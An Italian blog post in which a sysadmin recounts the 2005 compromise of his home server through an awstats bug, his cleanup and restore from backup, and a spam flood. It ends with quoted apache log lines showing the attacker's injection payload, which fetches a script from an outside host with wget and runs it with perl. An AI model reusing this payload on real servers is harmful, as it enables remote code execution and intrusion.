Commenti & Opinioni


Home Page | Commenti | Articoli | Faq | Documenti | Ricerca | Archivio | Storie dalla Sala Macchine | Contribuire | Login/Register

Craccato!

E' un tranquillo sabato mattina, piovoso e ventoso, ergo mi sto preparando per una bella colazione tranquilla seguita da una giornata di cazzeggiamento.

Mentre mi sorbisco il caffe' avvio il portatile e do' un'occhiata alla mia posta, oltre alle varie cavolate ci sono solo due mail "utili". Una e' il rapportino del backup giornaliero e la seconda e' il rapportino dell'analisi dei log. Ed e' questa che mi rovinera' la giornata.

Mi scorro la mail... solite cretinate nel log del firewall, soliti tentativi di fare login via ssh con utenti inesistenti... poi...

newuser: ymcx

A questo punto immaginatevi me, con gli occhi fuori dalle orbite ed il caffe' che mi erutta dalle orecchie... poi immaginatevi sempre me che scavalcato il tavolo di cucina (che non e' tanto difficile da scavalcare ma manco tanto facile) mi scapicollo su' per le scale, arrivo in soffitta dove ho il server e sradico di netto il cavo di rete dal server.

Seguono un buon numero di bestemmie e maledizioni varie.

Dopo di che ho portato il server dabbasso, ho finito di fare colazione (che tanto oramai non c'e' piu' da agitarsi) ed ho cominciato una vivisezione di quello che c'era sul server stesso.

Allora, da quello che sono riuscito a stabilire "l'amico" e' entrato usando un bug di awstats. Tale bug e' stato segnalato tempo addietro, ma io manco mi ricordavo di averlo installato sto' coso.

Comunque, dal log delle attivita' di apache risulta che hanno utilizzato questo bug per copiare ed eseguire un'eseguibile sul server ed aggiungere l'utente 'ymcx'. Poi pero' devono avere fatto una qualche cretinata perche' a parte questo non e' successo altro.

In ogni caso, meglio essere sicuri che no, quindi ho proceduto a re-installare da zero tutta la macchina, ripristinato i file di configurazione che mi interessavano, ripristinato i dati ed aggiornato awstats (pare che la versione 6.3 non sia vulnerabile).

In totale una mezza giornata di lavoro per il tutto.

Il che mi ha confermato che: 1) l'analisi dei log e' una buona cosa e 2) i backup non fanno mai male e 3) c'e' sempre qualche TDC la' fuori...

UPDATE

E cosi' giunse la domenica pomeriggio. Dopo aver cazzeggiato piu' o meno tutto il sabato tra regole di firewall e logging.

Ed e' a questo punto che il nostro eroe (io) si ricorda di un piccolo particolare. Il mio ISP mi fornice una miseranda casella di posta. Che io sostanzialmente non ho mai usato in vita mia. Ma tale casella mi serve per ricevere notizie relative all'hosting stesso.

Percui decido di ripristinare anche la parte relativa a quell'affare e di resuscitare fetchmail per scaricare quella posta.

Metto insieme il .fetchmailrc ad uopo e lancio.

Scarica i messaggi... 10, 20, 30, 40.... 50,.... 60, ............ (io penso: ellamadonna quanto ci mette) ...70, ............... 80, (io penso: sta diventando un po' troppo lento.. o sono io?) 90 .......... Error: local MTA refused connection.

Hu? Che e' sta cosa?

Cosi' scopro che il server e' di una lentezza allucinante... uptime. (io penso: hummm... load average 86, non suona troppo bene). Ma quanta accidenti di posta ho?

Cosi' decido di guardare via web-mail: 7300 messaggi!

Ooooookkkey, scaricare ed inoltrare nella mia casella tramite spamassassin non e' un'opzione. Si procede all'opzione 2: inoltrare direttamente in /dev/null.

Nonostante l'immediata cestinazione ci ho messo un bel 3 ore e passa a scaricare tutta l'immondizia.

UPDATE (2)

Dopo tutto il marasma ho avuto il tempo di controllarmi per benino i log, ieri pomeriggio ri-controllo e che ti trovo?

HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:22:27 +0100] "POST 
/cgi-bin/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%20
www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 290 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:27:13 +0100] "POST 
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%
20www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:28:03 +0100] "POST 
/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;
%20wget%20www.commandt.org/a;%20perl%20a;%20rm%20a;echo%20;echo| 
HTTP/1.0" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
200.193.248.219 - - [15/Feb/2005:04:32:15 +0100] "POST 
/awstats.pl?configdir=|echo%20;echo%20;cd%20/tmp;%20wget%20ww
E cosi' via... Ok, chi e' questo '200.193.248.219'? Oh, bene.. e parte una mail diretta al loro ISP. Ed oggi ho ricevuto risposta che stanno "investigando"... e vedremo se faranno qualche cosa oppure no.

Davide Bianchi
14/02/2005 00:00

 

I commenti sono aggiunti quando e soprattutto se ho il tempo di guardarli e dopo aver eliminato le cagate, spam, tentativi di phishing et similia. Quindi non trattenete il respiro.

Nessun messaggio this document does not accept new posts

Precedente Successivo


Il presente sito e' frutto del sudore della mia fronte (e delle mie dita), se siete interessati a ripubblicare uno degli articoli, documenti o qualunque altra cosa presente in questo sito per cortesia datemene comunicazione (o all'autore dell'articolo se non sono io), cosi' il giorno che faccio delle aggiunte potro' avvisarvi e magari mandarvi il testo aggiornato.


Questo sito era composto con VIM, ora e' composto con VIM ed il famosissimo CMS FdT.

Questo sito non e' ottimizzato per la visione con nessun browser particolare, ne' richiede l'uso di font particolari o risoluzioni speciali. Siete liberi di vederlo come vi pare e piace, o come disse qualcuno: "Finalmente uno dei POCHI siti che ancora funzionano con IE5 dentro Windows 3.1".

Web Interoperability Pleadge Support This Project
Powered By Gort